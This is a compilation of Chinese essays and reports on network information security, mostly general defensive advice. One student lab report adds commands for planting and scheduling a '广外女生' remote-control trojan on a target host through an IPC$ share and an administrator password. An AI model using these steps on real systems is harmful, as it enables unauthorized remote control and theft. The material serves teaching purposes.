通讯网络信息

2024-07-17

通讯网络信息(精选十篇)

通讯网络信息 篇1

1 通信网络信息系统存在的安全问题

现阶段我国通信网络信息系统存在的安全问题主要表现在两个方面,一是自然方面,一是认为方面。在自然方面,通信网络信息系统主要会受到温度、湿度、地震、海啸等不可抗力的自然因素所带来的困扰。因为一旦出现自然灾害,一定会对电力产生影响,而互联网通讯网络信息系统主要依靠电力来进行运行,所以自然灾害的发生必将会对网络信息的数据传输、系统维护带来极大的损失。针对这一问题,不少企业都备有紧急发电机,以保证在出现不可抗力的自然灾害的时候可以及时解决互联网通讯系统电力供应问题。在人为方面,互联网通讯信息系统主要存在着恶意攻击行为、计算机病毒、操作失误、网络脆弱、垃圾间谍软件等。比如恶意攻击行为就是在计算机网络信息运用的过程中,由于一定的经济利益或者其他目的而对网络信息数据进行有效的有选择性的攻击,通过窃取数据、上传病毒等技术手段,而使被攻击的网络信息系统崩溃。而互联网由于具有开放性的特点,极容易受到外界的攻击,特别是现在网络技术发展的同时黑客技术也在不断的发展,人们对互联网所以来的IPTCP的协议不理解或者不理想,从而给了互联网黑客极大的可趁空间,从而出现数据篡改、数据截取等现象。另一方面,由于互联网信息技术需要依靠人的操作,但是由于每个人所掌握的的互联网知识水平的有效,从而导致有的用户在进行互联网信息系统的操作时存在不当的现象发生,这种操作不当包括密码过于简单、对于账号信息不注意保密等,极大的加大了互联网通讯信息系统的危险性。

2 通讯网络信息系统的安全防护策略

2.1 注重实名认证等信息加密技术

实名认证是网络通讯信息系统的第一层方面,通过身份证的实名认证可以有效限制非法用户进行网络资源的访问。目前我国不少实名认证的信息技术主要是基于身份认证、手机认证、邮箱认证等各个方面,而这一切都是基于身份认证的基础上,所以一旦身份认证系统失败,将造成整个通讯网络安全系统的崩溃,所以目前加强通讯网络信息系统的安全防护,就必须注重对实名认证系统的强化,并能有效提升该系统的信息加密技术,提升用户对于互联网通讯技术的信任感。比如要求认证者需要首先注册一个账号,并且保证账号的唯一性,通过口令认证的方法登陆网络。

2.2 注重漏洞扫描技术

据相关的数据调查,在通讯网络信息系统运行的过程中做好对系统漏洞的管理和修补工作,可以极大的降低网络入侵的成功率,所以做好网络系统漏洞的扫描和修补技术非常重要。比如可以利用安全漏洞的扫描技术,通过远程或者本机对软硬件及网络协议或者系统安装方面存在的安全漏洞进行扫描和监测。一般通讯网络信息系统的漏洞扫描可以分文软件和硬件的漏洞,对于软件应该注重对平时所下载软件的安全性,对于硬件漏洞要及时进行补丁的下载,对漏洞及时进行修补,保证系统和应用服务器的安全运行。

2.3 提升入网测试技术

在通讯网络信息系统的安全防护中,入网测试技术决定着系统安全运行的效率。入网测试技术主要是针对联网设备以及相关安全产品进行测试,从而保证通讯网络信息系统可以安全入网,提升入网测试技术不仅可以发现通讯网络信息系统硬件所携带的安全隐患,而且能够确保骑在联网之后可以具有一定的可控性、可用性和可监督性,从而提升互联网通讯信息系统的安全运营效率。

2.4 开发应急恢复系统技术

应急回复系统技术主要是对通讯网络信息系统发生紧急断电下能够自动的进行数据的恢复和修复的技术,其有效保证了信息的有效传输和储存,从而降低网络威胁所造成的影响。要想完成这一目的需要成立相关的机构和部门,专门检查和修复通讯网络信息系统所存在的漏洞和故障,做好紧急应急方案,提升通讯网络信息系统的应急能力。

3 结束语

在当前网络信息技术飞速发达的背景下,通讯网络信息技术逐渐成为人们生活和生产重要的助手,极大的推进了我国社会的进步,所以做好通讯网络信息系统的安全防护措施具有非常重要的作用。在这个过程中,可以通过做好实名认证系统信息加密技术、漏洞修复技术、提升入网测试技术、开发应急回复系统技术等安全防护策略,加强对通讯网络信息系统对在运行过程中出现的网络攻击的应对能力,提升通讯网络信息系统安全运行效率。

摘要:随着互联网信息技术的不断发展,我们的生活和工作都发生了很大的变化,与此同时网络信息技术也极大了促进了我国社会经济的发展,但是通讯网络信息技术在带来极大便利的同时,也存在着极大的网络完全威胁,近几年随着网络黑客、病毒侵袭、数据窃取等网络安全事件的发生,通讯网络信息系统的安全技术问题已经成为信息网络时代最需要解决的问题。本文通过分析现阶段通信网络信息系统存在的安全问题,同时针对问些问题提出通讯网络信息技术的安全防护策略。

关键词:通讯网络信息,安全防护,技术

参考文献

[1]谢燕江.通讯网络信息系统的安全防护技术分析[J].电子技术与软件工程,2016(02):215.

[2]曹艳琴.计算机网络信息安全的防护技术探究[J].电子技术与软件工程,2016(05):217-218.

[3]苏国斌,胡伟健.试论通讯网络信息系统的安全防护技术[J].中国新通信,2014(03):87.

【企业网络】网络信息安全报告 篇2

一、实验目的及要求

该专周的目标是让学生掌握网络安全的基本框架,网络安全的基本理论。以及了解计算机网络安全方面的管理、配置和维护。

本课程要求在理论教学上以必需够用为原则,应尽量避免过深过繁的理论探讨,重在理解网络安全的基本框架,网络安全的基本理论。掌握数据加密、防火墙技术、入侵检测技术以及学习网络病毒防治。了解Windows 2000的安全、Web的安全、网络安全工程以及黑客常用的系统攻击方法。本课程要求学生对计算机的使用有一定了解(了解Windows的使用,具有键盘操作和文件处理的基础),并已经掌握计算机网络的基本原理。

二、专周内容

1、安全需求分析

(1)网络安全问题主要集中在对服务器的安全保护、防黑客和病毒、重要网段的保护及管理安全上。因此,我们必须采取相应的安全措施杜绝安全隐患,其中应该做到:

A、公开服务器的安全保护 B、防止黑客从外部攻击 C、入侵检测与监控 D、病毒防护 E、数据安全保护 F、网络的安全管理

(2)解决网络安全问题的一些要求

A、大幅度地提高系统的安全性(重点是可用性和可控性);

B、保持网络原有的特点,即对网络的协议和传输具有良好的透明性,能透明接入,无需更改网络设置;

C、易于操作、维护,并便于自动化管理,而不增加或少增加附加操作;

D、尽量不影响原网络拓扑结构,同时便于系统及系统功能的扩展;

E、安全保密系统具有较好的性能价格比。一次性投资,可以长期使用;

F、安全产品具有合法性,及经过国家有关管理部门的认可或认证;

(3)系统安全目标

A、建立一套完整可行的网络安全与网络管理策略;

B、将内部网络、公开服务器网络和外网进行有效隔离,避免与外部网络直接通信;

C、建立网站各主机和服务器的安全保护措施,保证他们的系统安全;

D、加强合法用户的访问认证,同时将用户的访问权限控制在最低限度;

E、全面监视对公开服务器的访问,及时发现和拒绝不安全的操作和黑客攻击行为;

F、加强对各种访问的审计工作,详细记录对网络、公开服务器的访问行为,形成完整的系统日志;

2、网络拓扑

3、网络安全的基本内容

(1)基本网络命令

A、ping命令: ping –t IP,向指定的计算机不停的发送数据包,按Ctr+Break快捷键可以查看统计信息并继续运行,按 Ctr+C可中止运行。

B、Tracert命令:tracert IP 显示从本地计算机到目标服务器所经过的计算机:

C、pathping pop.pcpop.com 除了显示路由外,还提供325S的分析,计算丢失包的%

(2)操作系统安全

A、屏蔽不需要的服务组件

开始——程序——管理工具——服务 出现以下窗口:

然后在该对话框中选中需要屏蔽的程序,并单击右键,然后选择“停止”命令,同时将“启动类型”设置为“手动”或“已禁用”,这样就可以对指定的服务组进行屏蔽了。B、关闭默认共享:“开始”——“程序”——“管理工具”——“服务”——“Server”

(3)数据库系统安全

A、使用安全的帐号策略和Windows认证模式

由于SQL Server不能更改sa用户名称,也不能删除这个超级用户,所以,我们必须对这个帐号进行最强的保护,当然,包括使用一个非常强壮的密码,最好不要在数据库应用中使用sa帐号,只有当没有其它方法登录到 SQL Server 实例(例如,当其它系统管理员不可用或忘记了密码)时才使用 sa。可以新建立一个拥有与sa一样权限的超级用户来管理数据库。安全的帐号策略还包括不要让管理员权限的帐号泛滥。

SQL Server的认证模式有Windows身份认证和混合身份认证两种。在任何可能的时候,应该对指向SQL Server的连接要求Windows身份验证模式。

Windows认证模式比混合模式更优越,原因在以下:

1)它通过限制对Microsoft Windows用户和域用户帐户的连接,保护SQL Server免受大部分Internet工具的侵害。

2)服务器将从Windows安全增强机制中获益,例如更强的身份验证协议以及强制的密码复杂性和过期时间。

3)使用Windows认证,不需要将密码存放在连接字符串中。存储密码是使用标准SQL Server登录的应用程序的主要漏洞之一。

4)Windows认证意味着你只需要将密码存放在一个地方。

要在SQL Server的Enterprise Manager安装Windows身份验证模式,步骤操作: 展开服务器组——右键点击服务器——然后点击“属性”——在安全性选项卡的身份验证中——点击“仅限Windows”。(4)网络防火墙工具:红墙主机网络防火墙 安装

1.具体操作如下:

第一步: 将“爱思红墙主机网络防火墙”的安装光盘插入驱动器,运行根目录下的Setup文件来运行其安装程序,进入“爱思红墙主机网络防火墙安装”窗口;

第二步:

在“欢迎安装爱思红墙主机网络防火墙”对话框中,单击“下一步”按钮;

第三步: 在“软件许可协议”对话框,接受协议点击“是”;

第四步: 点击“是”按钮,出现显示您计算机的相关信息,即判断是否可以安装本软件;

第五步: 单击“下一步”按钮,出现“选择目标位置”对话框;

第六步: 在该对话框中,单击“浏览”按钮,并在“选择文件夹”对话框中选择盘符作为驱动器,再指定相应的文件夹及路径,然后单击“确定”按钮;

第七步: 单击“下一步”按钮,出现“选择安装程序名称”对话框,您可自定义程序名称;

第八步: 单击“下一步”按钮,系统开始复制文件;

第九步: 进入“红墙主机网络防火墙配置”窗口,作出是否运行“红墙应用程序扫描系统”的选择后,点击“完成”。

相关设置:告警设置:系统提供了两种情况下的告警,即需要系统告警和不需要系统告警,您可据需要选取告警设置。

点击主界面中的“规则管理”按钮,弹出相应窗口,如下图:

网络监控中心:

(5)网络攻击工具:“广外女生”

它的基本功能有:文件管理方面有上传,下载,删除,改名,设置属性,建立文件夹和运行指定文件等功能;注册表操作方面:全面模拟WINDOWS的注册表编辑器,让远程注册表编辑工作有如在本机上操作一样方便;屏幕控制方面:可以自定义图片的质量来减少传输的时间,在局域网或高网速的地方还可以全屏操作对方的鼠标及键盘,就像操纵自己的计算机一样;远程任务管理方面,可以直观地浏览对方窗体,随意杀掉对方窗体或其中的控件;其他功能还有邮件IP通知等。

主要步骤:首先运行“gwg.exe”,出现如图窗口:

选中“服务端设置”,生成“GDUFS.exe”木马:

然后将“GDUFS.exe”复制到自己的C盘中,再根据一些命令把“GDUFS.exe”复制到目标主机的盘中,再进行运行。目标主机的IP:191.168.12.38 具体步骤及命令:

“开始”——“运行”——“cmd”

命令:net use 191.168.12.38ipc$ 123 /user:administrator 与目标主机之间建立联系

命令:net time 191.168.12.38 获取目标主机的时间

命令:at 191.168.12.38 08:21 net share c$=c: 与目标主机的C盘建立通道

命令:copy c:GDUFS.exe 191.168.12.38c$ 复制“GDUFS.exe”文件到目标主机的C盘中:

命令:191.168.12.38 10:49 c:GDUFS.exe 指定“GDUFS.exe”在目标主机中什么时候运行。

三、专周小结:

通过这次网络安全专周,我不仅仅是学到了很多知识,更是透彻的理解到了网络安全对生活已经将来工作的意义。

网络安全分为软件网络安全和硬件网络安全。一般我们说的网络安全就是软件上的网络安全,即局域网,互联网安全。

网络安全又分为内网安全和外网安全。在内外网安全中,内网安全则是重中之重。毕竟是家贼难防。据不完全统计,全国因为内网安全的问题,至少每年算是几亿美元。所以,网络安全特别重要。

至于在将来的工作中,我们也要严格尊市网络设备管理原则和使用秩序,对设备进行统一管理专人负责,严格要求自己对设备进行安全操作,保持强烈的责任感和服务意识,做好每一个细节,重点做好以下几项工作:

1,及时准确判断网络故障,做好上门维护工作或及时提醒网络合作商进行维护。

2,定期检查维护各网络设备的运行情况并进行维护。3,不定期对服务器进行更新和检查。

4,遇到特殊情况,及时向领导和老师汇报,努力提高应急处理问题和独立处理问题的能力。

医院信息系统网络信息安全研究 篇3

关键词:医院信息系统;安全;数据;网络

中图分类号:TP309 文献标识码:A文章编号:1007-9599 (2011) 07-0000-01

Hospital Information System Network Information Safety Research

Qin Yisi

(Zhanjiang Center People's Hospital,Zhanjiang524037,China)

Abstract:With the deepening of information technology,hospital information system applications are increasingly widespread.Hospitals for all sorts of information networking,sharing,also brought a degree of security for the test.This paper analyzes the characteristics of hospital information system,its data security and confidentiality of information were of technical and management.

Keywords:Hospital information system;Safety;Data;Net

医院信息系统是一个复杂庞大的计算机网络系统,其以医院的局域网为基础依托、以患者为信息采集对象、以财务管理为运转中心,对医院就诊的所有患者进行全面覆盖。医院信息系统包括了医患信息和医院管理等各种信息,对信息的网络安全进行保护,保证其信息的完整性和可靠性,是医院信息系统正常运转的根本条件。因此有必要对医院信息系统的网络数据进行安全管理,避免各种自然和人为因素导致的安全问题,保证整个系统的安全有效。

一、医院信息系统特点分析

医院信息系统的网络结构决定着系统功能性及有效性。系统的各种集散数据、通信和所提供的系统的扩充能力、自我维护、信息服务等都很大程度上依赖与医院信息计算机系统的网络结构。星形拓扑结构有利于信息的集中控制,能避免局部或个体客端机故障影响整个系统的正常工作,因此可以采用以星形拓扑为基础的分层复合型结构的信息系统进行医院数据的全面管理。其次,作为医院信息系统的主要数据管理模式和管理工具,医院的数据库系统是保证医院信息系统完整性和安全性的关键。

一般认为网络安全就是针对黑客、病毒等攻击进行的防御,而实际上对于医院的信息系统而言,网络安全还受到其他很多因素的威胁,比如:网络设计缺陷、用户非法进入、通讯设备损坏等。网络出现故障将造成患者重要信息损坏和财务管理数据丢失,导致医院的正常作业不能开展。因此本文从技术和管理两个层面对医院信息系统的网络安全维护进行了探讨。

二、医院信息系统网络安全的技术实现

网络、应用、数据库和用户这四个方面是建立医院信息系统安全体系的主要组成部分,只有保证了这些结构的安全,才能从基本上实现医院信息系统的网络安全。

首先是确保网络的安全。医院网络安全包括医院内部网络安全和内外网络连接安全,防火墙、通讯安全技术和网络管理工具等是最常用的技术。其次是确保应用系统的安全。计算机的应用系统完整性主要包括数据库系统和硬件、软件的安全防护。可以采用风险评估、病毒防范、安全审计和入侵检测等安全技术对系统的完整性进行保护。其中,网络安全事件的80%是来自于病毒,因此病毒防范是保证系统完整性的主要措施。然后是确保数据库的安全。对处于安全状态的数据库,可以采用预防性技术措施进行防范;对于已发生损坏的数据库,可以采用服务器集群、双机热备、数据转储及磁盘容错等技术进行数据恢复。最后是确保用户账号的安全。采用用户分组、用户认证及唯一识别等技术对医院信息系统的用户账号进行保护。

三、医院信息系统网络安全的管理体系

除了在技术上对医院信息系统的网络安全进行确保,还需要建立完善合理的安全管理体系,更高层次的保证医院所有有用数据的安全。

(一)进行网络的信息管理。作为现代化医院的重要资产,且具有一定的特殊性,医院的所有信息都有必要根据实际情况,对不同类型的信息因地制宜的制定各种合理的管理制度,分类管理,全面统筹。(二)进行网络的系统安全管理。随时关注网络上发布的系统补丁相关信息,及时完善医院信息系统,对需要升级的系统进行更新,通过确保系统的安全达到保护整个医院信息管理安全的目的。(三)进行网络的行为管理。由专门的网络管理人员利用网络管理软件对医院信息系统内的各种操作和网络行为进行实时监控,制定网络行为规范,约束蓄意危害网络安全的行为。(四)进行身份认证与授权管理。通过规定实现身份认证与权限核查,对医院信息系统的用户身份和操作的合法性进行检查验证,从而区分不同用户以及不同级别用户特征,授权进入信息系统。(五)进行网络的风险管理。通过安全风险评估技术,定期研究信息系统存在的缺陷漏洞和面临的威胁风险,对潜在的危害进行及时的预防和补救。(六)进行网络的安全边界管理。现代化医院的信息交流包括其内部信息和内外联系两部分。与外界的联系主要是通过Internet进行,而Internet由于其传播性和共享性,给医院的信息系统带来较大的安全隐患。(七)进行桌面系统安全管理。桌面系统作为用户访问系统的直接入口,用户能够直接接触的资源和信息一般都存放其上,因此对其进行安全管理非常重要。用户可以采用超级兔子魔法设置或Windows优化大师等应用软件对无关操作和非法行为进行限制。(八)进行链路安全管理。针对链路层下层协议的攻击一般是通过破坏链路通信而窃取系统传输的数据信息。因此要对这些破坏和攻击进行防御,医院可以通过加密算法对数据处理过程实施加密,并联合采用数字签名和认证仪器确保医院信息数据的安全。(九)进行病毒防治管理。网络技术和信息技术的不断发展,也滋长了各种病毒的出现。病毒是计算机系统最大的安全隐患,对系统信息的安全造成很大的威胁。(十)进行数据库安全管理。对数据库的安全管理应该配备专人专机,对不同的数据库类型采取不同的使用方式和广利制度,保护医院信息系统的核心安全。(十一)进行灾难恢复与备份管理。百密总有一疏,任何安全防护体系都不肯能完全对病毒进行防杀,因此为了避免数据的损坏和事故的发生,需要制定相应的数据恢复措施,对重要数据进行定期备份。

四、结束语

当今信息化的不断发展给医院的管理和高效运转带来了方便,但同时也带来了挑战。为了维护病人医患信息和医院财务信息,需要从技术和管理上加强对网络的安全工作,需要与时俱进,不断采用新技术,引进新方法,适应社会需求,将医院的信息化建设推向更高平台。

参考文献

[1]尚邦治.医院信息系统安全问题[J].医疗设备信息,2004,9

[2]从卫春.浅谈医院信息系统安全稳定运行[J].医疗装备,2009,15

[3]任忠敏.医院信息系统安全体系的建立[J].医学信息,2004,13

[4]黄慧勇.医院信息系统安全按风险与应对[J].医学信息,2009,15

论网络信息安全的信息管理 篇4

计算机网络信息管理是指以信息技术为载体, 以信息服务为对象, 融入计算机网络信息分布、储存、利用、服务的全过程。可以说, 保证网络信息安全是促进信息管理的前提, 在计算机网络信息管理中占有举足轻重的地位。笔者结合自身工作实践, 在本文中阐述了网络信息安全管理的概念及分类, 分析了当前网络信息的安全问题, 提出了进一步加强信息管理的对策措施, 以期对网络信息安全管理有所借鉴帮助。

1 网络信息安全管理的概念及分类

1.1 基础运行信息

所谓基础运行信息, 是网络信息管理工作的基本对象, 也是整个计算机网络信息的基础。基础运行信息主要指计算机网络IP地址、域名以及自治系统号等三类。可以说, 不管什么类型的计算机网络信息实现多元发展, 都必须以基础运行信息为基础和前提。

1.2 服务器信息

所谓服务器信息, 是与服务器运行密切相关的信息, 全面服务于计算机网络信息服务供给的全过程, 是检验计算机服务器运行质量和效率的最关键因素。计算机服务器信息主要包括基本配置参数、负载均衡指标、访问指标等。

1.3 用户信息

所谓用户信息, 是计算机用户身份的证明。计算机用户信息主要包括:用户姓名、用户部门、用户职位及权责等相关资料数据。

1.4 网络信息资源

所谓网络信息资源, 是计算机在为用户提供网络信息服务过程中, 所产生的信息资源。由于计算机网络结构的特殊性, 网络信息资源呈现出分散式、非线性式的特点, 这句导致网络信息资源在传输过程中, 会存在较多的安全隐患, 有被不安全信息介入的危险, 这需要引起广大计算机用户的密切关注。

2 当前网络信息安全问题分析

实践证明, 计算机网络信息管理中主要存在以下两种安全问题, 一种是信息安全检测, 这种问题是针对网络信息管理的完整性而言的;一种是信息访问控制问题, 这种问题是针对网络信息管理认证性和保密性而言的。

2.1 信息安全监测

科学的进行信息安全监测, 可以有效消除计算机网络的脆弱性, 在很大程度上提高网络信息资源的开放程度, 同时, 可以使计算机信息管理人员在第一时间发现计算机信息安全存在的隐患问题, 及时查清问题原因, 预警处理被攻击对象, 保证计算机网络信息系统中的关键程序、关键数据不被侵染, 确保网络信息的安全可靠。

2.2 信息访问控制问题

信息访问控制问题, 是计算机网络信息管理的核心所在。对于计算机网络信息资源的使用, 要严格信息控制访问要求, 使信息通信过程更加严密。也就是说, 计算机网络信息安全防护重点就是资源信息的发布过程和个人信息的储存过程。只有牢牢控制信息访问渠道, 才能从根本上保障计算机网络信息安全。

3 进一步加强信息管理的对策措施

3.1 强化思想认识, 健全完善制度

相关人员要进一步提升对计算机网络信息管理工作重要性的认识, 强化责任感和紧迫感。要根据所在单位的特点, 全面健全完善计算机信息管理制度, 切实规范如计算机应用管理、保密信息管理等工作。要建立网络安全应急预案, 为规范管理、确保安全夯实基础。同时, 要真正明确工作责任, 严格按照保密规定, 规范信息录入及发布流程, 及时消除信息管理安全隐患。要进行有针对性的教育培训, 及时组织开展计算机操作系统、网络知识、病毒防护等基本技能培训, 努力使计算机网络信息安全观念深入人心。

3.2 合理配置资源, 切实加强防范

一是要加强计算机病毒防护。要在中心服务器部上安装防毒、杀毒软件, 对内网、外网的客户端进行严格区分, 做好相关重要数据的备份工作。同时, 定期进行病毒扫描, 对于通过网络传输、邮件传输及移动介质接收的文件, 都可能携带病毒, 接收前要进行严格的扫描、查杀。二是要加强应急管理。要健全应急管理机制, 对出现的涉及网络信息安全的突发事件, 及时上报、处理, 查实原因、追究责任, 确保事件发生后把损失降到最低。三是要加强隔离管理。对内网、外网要通过物理方式或防火墙进行有效隔离, 保证防护外来攻击, 防止内、外网串联。

3.3 强化等级保护, 保障信息安全

要强化等级保护, 严格技术标准, 保障业务信息系统的安全。单位要成立专门的信息中心, 具体负责等级保护工作。信息安全基础设施要科学可靠, 强化信息系统运维管理, 有效提高系统的安全防护水平。同时, 要建立完善安全保护技术措施, 对网络、系统进行安全区域划分, 按照“水平分区、区内细分”的划分原则, 保证网络合理规划。要进一步加强制度建设和信息安全管理。严格本着“预防为主、建章立制, 加强管理、重在治本”的原则, 坚持管理与技术并重, 对信息安全工作的有效开展。起到了良好的规范作用。

3.4 落实专业措施, 确保安全运行

由于部分政府、高校、国企等计算机网络信息资源庞大, 所以可以采用专业性的解决方案来保护网络信息安全, 诸如: 运用网络门户网站保护解决方案, 从网络层、应用层到Web层, 对计算机网络信息进行全面防护。同时, 一些单位作为公共信息的提供者, 其网页经常被篡改、挂马, 这都大大影响了单位声誉。要使用防火墙、IDS/ IPS等, 具体来讲, 可以使用防火墙技术、代理服务器技术、入侵检测技术IDS、反病毒技术、认证技术、对信息进行加密等手段, 防止网页篡改、挂马。

4 总结

总而言之, 新形势下的计算机网络信息安全管理工作已经逐步迈向了系统化、集成化、多元化。但目前网络信息安全问题还比较突出, 只有强化思想认识, 健全完善制度;合理配置资源, 切实加强防范;强化等级保护, 保障信息安全;落实专业措施, 确保安全运行, 才能真正起到加强计算机网络信息安全防护的最终目的。

参考文献

[1]段盛.企业计算机网络信息管理系统可靠性探讨[J].《湖南农业大学学报:自然科学版》.2000 (26) :134-136.

[2]李晓琴;张卓容.医院计算机网络信息管理的设计与应用[J].《医疗装备》.2003 (16) :109-113.

[3]李晓红.妇幼保健信息计算机网络管理系统的建立与应用[J].《中国妇幼保健》.2010 (25) :156-158.

[4]罗宏俭.计算机网络信息技术在公路建设项目管理中的应用[J].《交通科技》.2009 (1) :120-125.

[5]刘永华.基于Agent的分布式入侵检测系统[J].《潍坊学院学报》.2006 (3) .

[6]蔡洪民;伍乃骇;滕少华.局域网络安全扫描系统的设计与实现[J].《微计算机应用》.2005 (1) :45-48.

[7]金洲.计算机网络安全的管理与技术[J].《现代营销》.2010 (4) :51-53

通讯网络信息 篇5

时间:2009-12-16 13:00作者:张然 段彦东新闻来源:正义网

正义网河南12月16日讯(通讯员张然 段彦东)随着互联网的飞速发展,网络舆情已成为社会监督的一种新媒体。河南淮阳检察院采取积极应对新举措,使网络舆情实时有监控,信息员实时有发现。由于工作细致、扎实、靠前、有效,目前没有出现一起有关检察系统的负面报道。

高度重视网络舆情。为增强政治敏锐性,切实掌控网络舆情,该院各科室组建网络信息员,每天上班第一件事就是及时搜索寻找是否有涉检网络舆情的事件,一旦发现及时报告。以此防范办理的案件和检察人员成为网络炒作的热点。

及时掌握网络舆情。该院组织建立了一支网络舆情评论员,对可能引起媒体高度关注的事件,凡是涉及检察工作或检察队伍的舆情信息,发现后及时分析研判,抓紧核查真相,认真评估影响,提出应对举措。

积极应对网络舆情。对网民反映情况属实或有一定根据的批评性的网络舆情,该院做到及时纠错、公开答复、争取工作的主动性及靠前性;对于反映情况失实或恶语中伤的,要通过正当途径公开辟谣、以正视听;对于不当炒作、可能引发重大不稳定事件的,要依靠党委和上级院的领导,依法妥善处置;对媒体关注甚至热炒的有关敏感案件,坚决做到思想敏锐、行动迅速、应对得当、果断决策。

通讯网络信息 篇6

关键词:网络;信息安全;现状;根源;措施

一、网络信息安全现状

(一)黑客日趋猖狂

计算机软件与硬件存在固有的缺陷,这就为黑客提供了机会,使他们得以开展破坏工作。更可怕的是,他们的攻击手段不断变换花样,一系列复杂的病毒、逻辑炸弹让防毒软件应接不暇,利用这些攻击手段,他们窃取机密信息,给网络信息安全带来极大危害。美国《金融时报》曾报道过:全球平均每20秒就发生一次网上入侵事件,他们给美国每年造成的经济损失也是令人咋舌,竟高达100多亿美元。

(二)计算机犯罪案件逐年增多

“计算机犯罪是指一些掌握计算机专业技术的人员,通过已掌握的技术,查询网络缺陷,对网络缺陷部分进行攻击,以达到盗取他人信息和钱财的目的。”计算机犯罪涉及物质和精神层面的内容,已经随着计算机的普及渗透到各行各业,且将演变成主要犯罪方式,危害更甚于传统犯罪。

我国的计算机犯罪数量逐年上升,曾经震惊世人的一起案件竟造成直接经济损失2100万元,令人不得不反思和警醒。

(三)计算机病毒入侵频繁

跟传统病毒一样,计算机病毒有极强的传染性,破坏性以及惊人的繁衍性,可以不断向网络系统入侵。计算机病毒入侵网络服务器系统后,可致使服务器瘫痪,大量有效数据丢失,信息系统的稳定性和安全性自然受到威胁。防毒软件发展滞后拿它也是束手无策。

(四)网络信息安全问题的重要性日益提升

2013年6月,前中情局(CIA)职员爱德华·斯诺登披露了美国国安局代号为“棱镜(PRISM)”的秘密项目,一时间美国舆论一片哗然。而事实上,美国还有惊人规模的海外监听计划,经斯诺登揭露,有引发外国外交地震的趋势。

正所谓“明者因时而变,知者随事而制”,当前各种不安全因素充斥着我们的生活,面对此种复杂的环境,习总书记的新安全观应势而生,恰逢其时。这也表明中国越来越关注网络信息安全,将其上升至国家战略高度,但同时也存在着纰漏,有待进一步提高改善。

二、网络信息安全问题产生的根源

(一)认知上的根源

首先,对普通大众来说,他们对计算机安全问题特别是网络犯罪的态度较为“宽容”,主要原因是:(1)无人员伤害,破坏不明显;(2)造成的损失并非个人承担,而是由政府或单位善后;(3)认为计算机罪犯是“天才”。因此,他们对信息安全问题不太关心,安全意识淡薄。

(二)社会性根源

互联网中的自由为道德相对主义(“你想怎样就怎样”或者“怎样都行”)和极端个人主义提供了最好的土壤和借口,最直接表现为滥用网络现象的出现与屡禁不止。此外,西方社会传统的“冒险和发现”的精神滋生了大批黑客。虽然,我们应该承认早期的黑客确实存在冒险、发现知识一类的正面因素,然而,冒险和犯罪只有一线之隔,在物欲横流的今天,有些年轻人经不住诱惑,顶风作案。

(三)技术性根源

1、计算机系统本身的脆弱性。计算机系统本身具有脆弱性,无法抵御自然灾害和人为的破坏。如水、火、地震的破坏及环境(湿度、振动、冲击、污染)的影响以及硬件设备故障,突然断电或电源波动大及各种误操作等危害。这些危害有的会损害设备,有的则造成数据丢失。

2、技术本身的缺陷。电磁泄露、通信与网络的弱点、软件缺乏安全性、安全技术标准不统一等都是计算机网络本身存在的技术缺陷,即便是微软巨头也不可避免地存在技术漏洞。

(四)政治性根源

美国著名学者托夫勒曾经指出:“谁掌握了信息、控制了网络,谁就将拥有整个世界。”一句话道出了互联网对世界政治经济格局的影响,美国便是最好的例子,它凭借其在网络技术上的基础和优势,利用互联网,在各方面、各领域抢占先机,其他国家认识到这一重要性也加大投资想分一杯羹,甚至不惜从网上窃取他国机密信息,散布不实言论。“棱镜计划”的曝光,正是让美国的这种政治野心暴露无遗,也让其“贼喊捉贼”的虚伪外交公之于众。

(五)经济性根源

经济上的根源主要指:一方面是指网络犯罪成本低,仅需一台联网的终端机,过程大大加快;第二方面,网络犯罪获利高,例如,美国金融界就是相当大的受害者,每年损失达100多亿美元,英国每年近30亿美元。

三、网络信息安全的防范措施

(一)突出网络安全的战略地位

树大招风,中国作为最大的发展中国家,其崛起让其他国家不安,因而成为受网络冲击严重的国家,必须提高对网络安全的重视程度,将其上升至国家战略高度,建立完善网络安全防护体系,从根本上提升我国网络安全防护水平。

(二)建立一个权威性强的职能部门

各级领导要重视网络信息安全管理,做到有计划、有措施、有检查、有落实。成立技术管理机构,积极开展保密技术的研究和开发,对出现的安全问题能及时、准确的处理。建立健全软、硬件操作规程,作业运行规程和上机时间记录规程,形成有效、完整的网络信息安全管理运行机制。对违反制度的人要作出相应的处罚。

(三)提高重要档案管理人员的业务水平

国家各部门,社会各领域要对负责档案管理的工作人员进行培训,使之具备将各类重要信息分归档案和计算机高水平管理的能力,从而实现档案的安全管理。

(四)加快立法进程,健全法律体系

自1996年成立国务院信息化工作领导小组以来,我国先后颁布了《计算机软件保护条例》、《中华人民共和国计算机信息系统安全保护条例》、《中华人民共和国信息网络国际联网安全管理暂行规定》等法规,且网络安全法制工作还在进行。尽管这些法规在维护网络安全方面还有不健全的地方,但也起到了重要作用,我们还需吸取和借鉴国外的先进经验,结合我国实际,不断修改和完善现行法律体系,做网络安全强国。

四、结论

随着网络信息技术的飞速发展,新的安全问题将更加难以对抗。这就需要信息安全技术不断的创新与完善,要不断完善和加强自身管理制度,不断提高网络工作人员素质。从而引导网络发挥其正面的作用,让其更安全可靠地服务于国计民生。

参考文献:

[1] 唐明双.论对计算机网络安全及建设的研究[J].数字技术与应用.2012(12).

[2] 王大鹏.计算机网络安全与防范策略研究[J].科技视界.2012(26).

[3] 朝晓华.浅析计算机信息安全技术[J].黑龙江科技信息,2010.

[4] 关良辉.电力企业局域网的信息安全研究[J].电力安全技术,2010.(6).

[5] 钟福训.网络安全方案探讨[J].齐鲁石油化工,2004.32(4):322-325.

[6] 刘广辉.计算机网络通信安全问题与防范策略探讨[J].信息安全与技术.2012(06).

[7] 杨珂.浅谈网络信息安全现状[J].天津市信息中心.2005

[8] 张钢.从美国“棱镜计划”看我国网络信息安全问题.法制与社会.2014,02.

通讯网络信息 篇7

随着计算机网络与通信技术的高速发展, 计算机越来越多地应用到社会生产与生活的众多领域, 近年来国内高校自动化与网络化建设不断发展, 数字化图书馆建设也迅速发展起来。但网络如同一把双刃剑, 网络环境在带给高校图书馆巨大变革, 实现网络信息资源的共建共享的同时, 让我们必须同时面对网络的开放性所带来的方方面面的安全问题, 如病毒泛滥、系统漏洞增多、黑客入侵攻击等。

高校图书馆数字化建设过程中, 馆藏文献资源体系结构不断向数字化、网络化多元化发展, 网络信息资源的共享性, 使信息资源得以分散, 减轻了图书馆信息资源承载负荷, 节约了大量的人力、物力和财力, 提高了工作效率, 但网络信息资源的分散共享性又导致了网络的脆弱性、复杂性以及网络受到各种攻击的可能性。因此, 如何保障图书馆网络安全高效运行, 成为高校图书馆自动化网络化建设进程中必须面对的关键问题。

